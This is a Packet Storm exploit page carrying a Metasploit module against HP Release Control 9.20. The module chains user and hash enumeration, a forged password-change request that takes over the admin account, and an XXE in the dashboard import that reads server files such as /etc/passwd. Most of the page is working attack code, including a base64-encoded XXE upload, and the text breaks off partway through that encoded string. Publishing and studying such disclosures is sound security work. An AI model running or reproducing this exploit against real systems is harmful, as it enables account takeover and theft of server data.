exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HP Release Control 9.20.0000 Build 395 XXE

HP Release Control 9.20.0000 Build 395 XXE
Posted May 19, 2014
Authored by Brandon Perry | Site metasploit.com

This Metasploit module takes advantage of three separate vulnerabilities in order to read an arbitrary text file from the file system with the privileges of the web server. You must be authenticated, but can be unprivileged since a privilege escalation vulnerability is used. Tested against HP Release Control 9.20.0000, Build 395 installed with demo data. The first vulnerability allows an unprivileged authenticated user to list the current users, their IDs, and even their password hashes. Can't login with hashes, but the ID is useful in the second vulnerability. When a user changes their password, they post the ID of the user who is going to have their password changed. Just replace it with the admin ID and you change the admin password. You are now admin. The third vulnerability is an XXE in the dashboard XML import mechanism. This is what allows you to read the file from the file system. This Metasploit module is super ghetto half because it was an AMF application, half because I worked on it longer than I wanted to.

tags | exploit, web, arbitrary, vulnerability, xxe
SHA-256 | 32678ccb2a4454a4f3176a572bfd08436712de26dce1cdfb8b2986d281d3c14e

HP Release Control 9.20.0000 Build 395 XXE

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'HP Release Control Authenticated XXE',
'Description' => %q{
This module take advantage of three separate vulnerabilities in order to
read an arbitrary text file from the file system with the privileges
of the web server. You must be authenticated, but can be unprivileged
since a privilege escalation vulnerability is used. Tested against
HP Release Control 9.20.0000, Build 395 installed with demo data.

The first vulnerability allows an unprivileged authenticated user to list
the current users, their IDs, and even their password hashes. Can't login
with hashes, but the ID is useful in the second vulnerability.

When a user changes their password, they post the ID of the user who
is going to have their password changed. Just replace it with the
admin ID and you change the admin password. You are now admin.

The third vulnerability is an XXE in the dashboard XML import mechanism.
This is what allows you to read the file from the file system.

This module is super ghetto half because it was an AMF application,
half because I worked on it longer than I wanted to.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile [at] gmail.com>'
],
'References' =>
[
],
'DisclosureDate' => 'May 16 2014'
))

register_options(
[
OptString.new('TARGETURI', [ true, "Base directory path", '/']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
], self.class)
end

def check
end

def run
print_status("Authenticating")

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})

cookie = res.get_cookies

post = {
'j_username' => datastore['USERNAME'],
'j_password' => datastore['PASSWORD'],
'buttonName' => ''
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})

if res and res.headers['Location'] !~ /index.jsp/
fail_with("Authentication failed")
end

cookie = res.get_cookies

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
'cookie' => cookie
})

cookie = cookie + res.get_cookies

#not sure why this always fails the first time. Whatever.
id = nil
while id == nil
id = get_admin_id(cookie)
end

print_status("Found admin id: " + id)
print_status("Changing admin's password...")

password = change_admin_password(cookie, id)
print_status("Changed admin password to: " + password)

post = {
'j_username' => 'admin',
'j_password' => password,
'buttonName' => ''
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})

cookie = res.get_cookies

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})

if res.headers['Location'] !~ /index.jsp/
fail_with("Login failed")
end

cookie = res.get_cookies

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
'cookie' => cookie
})

cookie = cookie + res.get_cookies

post = {
'com.mercury.dashboard.screen_resolution_width' => 2560,
'com.mercury.dashboard.arch.fieldtree.date.timeZone' => 300,
'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser' => 1400274351481
}

#need to send this so that the next request doesn't fail
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'portal', 'PageView.jsp'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})

print_status("Exploiting XXE...")

data = Rex::Text::decode_base64("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjb20ubWVyY3VyeS5kYXNoYm9hcmQuYXJjaC5maWVsZHRyZWUuZm9ybUZvckZpZWxkdHJlZS4iDQoNClkNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iLmltcG9ydEZyb21GaWxlIjsgZmlsZW5hbWU9IkRhc2hib2FyZF9PYmplY3RzX0V4cG9ydF8yMDE0MDUxNC54bWwiDQpDb250ZW50LVR5cGU6IHRleHQveG1sDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPgo8RXhwb3J0TGlzdCB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48dmVyc2lvbj4yPC92ZXJzaW9uPjxNb2R1bGU+PG5hbWU+UmVsZWFzZSBDb250cm9sIERlZmF1bHQgTW9kdWxlPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC91dWlkPjxkZXNjcmlwdGlvbj4meHhlOzwvZGVzY3JpcHRpb24+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48YWxsb3dTZWxmU2VydmljZT5mYWxzZTwvYWxsb3dTZWxmU2VydmljZT48Y29waWFibGU+dHJ1ZTwvY29waWFibGU+PGFsbFVzZXJzQWNjZXNzPnRydWU8L2FsbFVzZXJzQWNjZXNzPjxwYWdlPjxwYWdlU2VxdWVuY2U+MDwvcGFnZVNlcXVlbmNlPjx0aXRsZT5UcmVuZHM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5MYXRlbnQgQ2hhbmdlcyBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+M2I3YmI2YWEwMjk3N2Y1Yzo2OTQwMjEwYjoxMTYzYmNiMzk0YTotN2ZkZjwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkxOF1bTGF0ZW50XTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlt3ZWVrXVtXZWVrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjI8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PHBvcnRsZXQ+PHRpdGxlPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MTJdW0FueV08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5DaGFuZ2VzIE92ZXIgVGltZTwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5wb3J0bGV0RWRpdGVkPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkZpbHRlcjwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMjk0OTEyXVtBbnldPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W3dlZWtdW1dlZWtdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48YXV0b1JlZnJlc2g+ZmFsc2U8L2F1dG9SZWZyZXNoPjxyZWZyZXNoSW50ZXJ2YWw+MDwvcmVmcmVzaEludGVydmFsPjwvcGFnZT48cGFnZT48cGFnZVNlcXVlbmNlPjE8L3BhZ2VTZXF1ZW5jZT48dGl0bGU+QW5hbHlzaXM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W1BFTkRJTkdfQVBQUk9WQUxdW1BlbmRpbmcKCQkJCQkJCUFwcHJvdmFsXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48cG9ydGxldD48dGl0bGU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlJlcXVlc3QgU3RhdHVzPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4yPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTdGF0dXMgRGlzdHJpYnV0aW9uPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZmPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+VGltZSBGcmFtZTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0PjxhdXRvUmVmcmVzaD5mYWxzZTwvYXV0b1JlZnJlc2g+PHJlZnJlc2hJbnRlcnZhbD4wPC9yZWZyZXNoSW50ZXJ2YWw+PC9wYWdlPjxwYWdlPjxwYWdlU2VxdWVuY2U+MjwvcGFnZVNlcXVlbmNlPjx0aXRsZT5Qb3N0IEltcGxlbWVudGF0aW9uPC90aXRsZT48cG9ydGxldD48dGl0bGU+T3V0Y29tZSBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MjBdW0Nsb3NlZF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5PdXRjb21lIEdyb3VwZWQgQnkgUmlzazwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD42YTM2NzNjOWZlYjc2ZGNiOi01MTk3MDhjYzoxMTcyYmE1NzllZDotN2ZmMTwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+cG9ydGxldEVkaXRlZDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkyMF1bQ2xvc2VkXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPk1pbmltdW4gVmFsdWU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5JbnRlcnZhbDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMTBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5NYXhpbXVtIFZhbHVlPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsxMDBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5OdW1lcmljIFR5cGU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W2NhbGN1bGF0ZWQtcmlza11bY2FsY3VsYXRlZC1yaXNrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjE8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PGF1dG9SZWZyZXNoPmZhbHNlPC9hdXRvUmVmcmVzaD48cmVmcmVzaEludGVydmFsPjA8L3JlZnJlc2hJbnRlcnZhbD48L3BhZ2U+PC9Nb2R1bGU+PFBvcnRsZXREZWZpbml0aW9uPjxCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPkNIQU5HRV9JTVBBQ1RfQU5BTFlTSVNfUkFUSU88L2lkPjxuYW1lPkNoYW5nZSBSZXF1ZXN0IEltcGFjdCBBbmFseXNpcyBSYXRpbzwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+ZGVmd2FmZHNhZmRzYTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+U3RhdHVzIENvbG9yPC9jb2xvclNvdXJjZT48dG9vbHRpcFNvdXJjZT4jIFJlcXVlc3RzPC90b29sdGlwU291cmNlPjx0b29sdGlwQ29udGFpbnNIVE1MPmZhbHNlPC90b29sdGlwQ29udGFpbnNIVE1MPjxvcmllbnRhdGlvbj52ZXJ0aWNhbDwvb3JpZW50YXRpb24+PGh5cGVybGluaz48aHlwZXJsaW5rVHlwZT5ub0h5cGVybGluazwvaHlwZXJsaW5rVHlwZT48aHlwZXJsaW5rU291cmNlLz48L2h5cGVybGluaz48L0NoYXJ0UG9ydGxldERlZmluaXRpb24+PGJhck5hbWVTb3VyY2U+U3RhdHVzPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+U3RhdHVzPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48L0JhckNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+QmFyQ2hhcnQ8L3R5cGU+PG5hbWU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi0